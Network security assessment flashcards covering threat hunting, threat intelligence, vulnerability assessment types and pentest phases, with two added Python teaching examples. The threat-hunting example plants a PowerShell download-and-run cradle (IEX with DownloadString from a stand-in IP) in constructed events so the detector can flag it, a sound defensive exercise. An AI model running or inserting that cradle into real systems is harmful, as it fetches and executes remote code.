Network Security Assessment Flashcards
Describe the Steps of Threat Hunting:
1) Hypothesis
2) Collect and process
3) Trigger
4) Investigation
5) Response
1) Form a hypothesis from known adversary TTPs (the technique you expect to find in your environment).
2) Collect and process the relevant data, enriched with threat intelligence.
3) A threat-detection tool or the hunter's own query triggers on an anomaly that matches the hypothesis.
4) Investigate the anomaly and eliminate any confirmed threat.
5) Respond and report: document what was found so it becomes a standing detection.
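The five steps above, worked through as an added example (not part of the original flashcards): a hunt whose hypothesis is "adversaries launch PowerShell with an encoded command to hide what they run". The Sysmon-style process-creation records, host names, users and the 198.51.100.7 URL are all constructed for the example; the decode logic is real (PowerShell's -EncodedCommand takes base64 of UTF-16LE text and accepts any unambiguous prefix of the flag name).

```python
"""Hypothesis-driven hunt for encoded PowerShell over constructed process events.

Steps follow the card: hypothesis -> collect and process -> trigger ->
investigation -> response (a report with indicators for future detection).
"""
import base64
import re

# 1) Hypothesis, phrased as a TTP: adversaries hide commands from casual review by
#    launching PowerShell with -EncodedCommand (ATT&CK T1059.001 with T1027).
HYPOTHESIS = "Encoded PowerShell launched in user sessions indicates macro-driven or hands-on intrusion"

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def encode_ps(command):
    """-EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(blob):
    """Return the decoded command, or None if the token is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed Sysmon-style process-creation records (not real telemetry).
EVENTS = [
    {"host": "ws01", "user": "alice", "image": PS_IMAGE, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"host": "ws02", "user": "bob", "image": PS_IMAGE,
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')")},
    {"host": "srv01", "user": "svc_backup", "image": PS_IMAGE, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"host": "ws03", "user": "carol", "image": PS_IMAGE, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -EncodedCommand " + encode_ps(r"Get-Process | Out-File C:\Temp\p.txt")},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the flag loosely and let a successful decode decide what counts.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e\w*\s+(\S+)")


def collect(events):
    """2) Collect and process: keep only PowerShell launches from the full event stream."""
    return [e for e in events if e["image"].lower().endswith("powershell.exe")]


def trigger(events):
    """3) Trigger: flag any launch whose -e* argument decodes as UTF-16LE base64."""
    hits = []
    for e in events:
        for m in ENC_FLAG.finditer(e["cmdline"]):
            decoded = decode_ps(m.group(1))
            if decoded is not None:
                hits.append({"event": e, "decoded": decoded})
                break
    return hits


OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def investigate(hit):
    """4) Investigation: enrich with the parent process and payload behaviour, then score."""
    parent = hit["event"]["parent"].lower()
    decoded = hit["decoded"]
    reasons = []
    if parent.endswith(OFFICE_PARENTS):
        reasons.append("spawned by an Office application")
    urls = URL_RE.findall(decoded)
    if urls:
        reasons.append("fetches remote content")
    if re.search(r"(?i)\biex\b|invoke-expression", decoded):
        reasons.append("executes a downloaded string")
    severity = "high" if len(reasons) >= 2 else ("medium" if reasons else "low")
    return {**hit, "severity": severity, "reasons": reasons, "urls": urls}


def run_hunt(events):
    """5) Response: report the findings plus indicators to turn into a standing detection."""
    findings = [investigate(h) for h in trigger(collect(events))]
    return {
        "hypothesis": HYPOTHESIS,
        "events_reviewed": len(events),
        "findings": findings,
        "iocs": sorted({u for f in findings for u in f["urls"]}),
        "detection": "process_create: image ends with powershell.exe and an -e* argument decodes as UTF-16LE base64",
    }


if __name__ == "__main__":
    for f in run_hunt(EVENTS)["findings"]:
        print(f["severity"], f["event"]["host"], f["event"]["user"], "|", f["decoded"])
```

The benign encoded launch by carol is still reported, at low severity: the trigger finds everything matching the hypothesis, and it is the investigation step (parent process, remote fetch, IEX) that separates the Word-spawned downloader from an admin's one-liner. The svc_backup event shows why the decode check matters: "-ExecutionPolicy Bypass" also starts with -e but is not an encoded command.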
What is Cyber Threat Intelligence (CTI)?
The collection and analysis of information about threats and adversaries for the preparedness, prevention, and response against cyber-attacks.
Describe these types of Threat Intelligence:
1) Strategic
2) Tactical
3) Operational
4) Technical
1) High-level information on changing risks.
2) Information on attacker’s TTPs
3) Information on specific incoming attacks.
4) Information on specific indicators of compromise.
Describe these Threat Intelligence Sources:
1) OSINT
2) HUMINT
3) SIGINT
4) TECHINT
5) SOCMINT
6) CCI
1) Information collected from publicly available sources.
2) Information collected from interpersonal contacts.
3) Information collected by intercepting signals.
4) Information collected from the adversary's equipment.
5) Information collected from social media sites.
6) Information collected from established security infrastructure.
Describe the following:
1) Surface Web
2) Deep Web
3) Dark Web
1) Web pages and content that search engines index and any normal browser can reach.
2) Web pages and content that search engines do not index (login-protected, dynamically generated, or unlinked), even though a normal browser can reach them with the right address and credentials.
3) Subset of the deep web reachable only through anonymising overlay software (Tor, for example), where both sites and visitors are hard to trace.
What is Vulnerability Assessment?
An in-depth examination of a system's or application's ability to withstand exploitation, producing a list of its vulnerabilities.
Describe these types of scanning:
1) Active Scanning
2) Passive Scanning
1) The attacker interacts directly with the target network to find vulnerabilities, sending probes/packets to its hosts.
2) The attacker finds vulnerabilities without direct contact with the network, inferring details (OS, services, versions) by observing existing traffic and TCP connections.
Describe these types of Vulnerability Assessments:
1) Active
2) Passive
3) External
4) Internal
1) Uses a network scanner to find hosts, networks, services and vulnerabilities.
2) Sniffs network traffic to discover host, networks, services and vulnerabilities.
3) Assesses the network from a hacker's perspective, from the outside world.
4) Scans the internal infrastructure to discover exploitable vulnerabilities.
Describe these types of Vulnerability Assessments:
1) Host-based
2) Network-based
3) Application
4) Database
1) Conducts a configuration-level check to evaluate the possibility of compromise.
2) Determines network security attacks that may occur.
3) Tests the web infrastructure for known vulnerabilities.
4) Focuses on testing databases.
Describe these types of Vulnerability Assessments:
1) Wireless Network
2) Credentialed
3) Manual
4) Distributed
5) Non-Credentialed
6) Automated
1) Determines vulnerabilities on wireless networks.
2) Assesses the network with valid credentials for the target hosts, so the scanner can log in and check configuration and patch levels.
3) Manually assesses, ranks, and scores the vulnerabilities.
4) Assesses the organization's distributed assets, such as client-server applications.
5) Assesses the network without any credentials.
6) Automated tools are used to assess vulnerabilities.
What are the six steps of the Vulnerability-Management Life Cycle?
1) Identify assets and create a baseline.
2) Vulnerability Scan
3) Risk Assessment
4) Remediate
5) Verification
6) Monitor
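The six steps as a data flow, added here as an example that is not part of the original flashcards. The asset baseline, scan findings, CVSS scores and criticality weights are all constructed for the example; the point it adds is that verification is a rescan compared against the earlier findings, not a closed ticket, and that a scanned host missing from the baseline is an inventory gap rather than a ranked finding.

```python
"""Vulnerability-management life cycle over constructed scan data."""

# 1) Identify assets and create a baseline (constructed inventory, not real).
#    Value: (hostname, business criticality).
BASELINE = {
    "10.0.0.5": ("web01", "high"),
    "10.0.0.6": ("db01", "high"),
    "10.0.0.20": ("kiosk01", "low"),
}
CRITICALITY_WEIGHT = {"high": 2.0, "medium": 1.0, "low": 0.5}

# 2) Vulnerability scan output (constructed, scanner-neutral): one finding per row.
SCAN_1 = [
    {"host": "10.0.0.5", "plugin": "openssl-outdated", "cvss": 7.5},
    {"host": "10.0.0.6", "plugin": "weak-db-auth", "cvss": 9.8},
    {"host": "10.0.0.20", "plugin": "openssl-outdated", "cvss": 7.5},
    {"host": "10.0.0.99", "plugin": "smb-signing-disabled", "cvss": 5.3},  # not in the baseline
]
SCAN_2 = [  # rescan after the remediation window (constructed)
    {"host": "10.0.0.5", "plugin": "openssl-outdated", "cvss": 7.5},   # patch did not take
    {"host": "10.0.0.20", "plugin": "openssl-outdated", "cvss": 7.5},  # deferred, still open
    {"host": "10.0.0.6", "plugin": "tls-weak-cipher", "cvss": 5.9},    # new finding
]


def finding_key(f):
    return (f["host"], f["plugin"])


def assess_risk(scan, baseline):
    """3) Risk assessment: rank findings by CVSS weighted by asset criticality.
    Hosts outside the baseline are returned separately as an inventory gap."""
    ranked, unknown = [], set()
    for f in scan:
        if f["host"] not in baseline:
            unknown.add(f["host"])
            continue
        name, crit = baseline[f["host"]]
        ranked.append({**f, "asset": name, "priority": f["cvss"] * CRITICALITY_WEIGHT[crit]})
    ranked.sort(key=lambda f: f["priority"], reverse=True)
    return ranked, sorted(unknown)


def plan_remediation(ranked, threshold=7.0):
    """4) Remediate: findings at or above the threshold get fixed this cycle;
    the rest are tracked and picked up again in step 6."""
    return [f for f in ranked if f["priority"] >= threshold]


def verify(before, after):
    """5) Verification: the rescan decides. A finding is closed only if it no
    longer appears; anything that appears for the first time is new."""
    b = {finding_key(f) for f in before}
    a = {finding_key(f) for f in after}
    return {"closed": sorted(b - a), "open": sorted(b & a), "new": sorted(a - b)}


def monitor(verification):
    """6) Monitor: everything still open or newly found feeds the next cycle."""
    return sorted(verification["open"] + verification["new"])


if __name__ == "__main__":
    ranked, unknown = assess_risk(SCAN_1, BASELINE)
    print("inventory gap:", unknown)
    for f in plan_remediation(ranked):
        print("fix now:", f["asset"], f["plugin"], f["priority"])
    result = verify(ranked, SCAN_2)
    print("verification:", result)
    print("carry forward:", monitor(result))
```

Because `verify` is keyed on (host, plugin), a host that was "fixed" but still shows the finding on rescan stays open, which is the case web01 illustrates; the new db01 cipher finding goes back to step 2 rather than being lost because its ticket never existed.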
Describe the following:
1) Security Audit
2) Vulnerability Assessment
3) Penetration Testing
1) Checks whether an organization follows a set of security policies and procedures.
2) Discovers the vulnerabilities in an information system.
3) Methodical approach that includes both a security audit and a vulnerability assessment, and goes further by attempting to exploit the vulnerabilities found to show their real impact.
Describe the following teams:
1) Blue Team
2) Red Team
3) Purple Team
4) White Team
1) Detects and mitigates the attackers' activities (the defenders).
2) Finds network and system vulnerabilities from the attacker's perspective (the simulated adversary).
3) Comprised of both the blue and red teams, sharing findings so detection improves during the exercise.
4) Acts as referee between the blue and red teams: sets the rules of engagement and monitors the exercise, but performs no tests itself.
Describe the following:
1) Black Box
2) White Box
3) Grey Box
1) The tester has no knowledge of the system.
2) The tester has all knowledge of the system.
3) The tester has partial knowledge of the system.
What’s involved in these phases of Penetration Testing:
1) Pre-Attack
2) Attack
3) Post-Attack
1) Research (Information Gathering)
2) Testing/Exploitation
3) Documentation and Reporting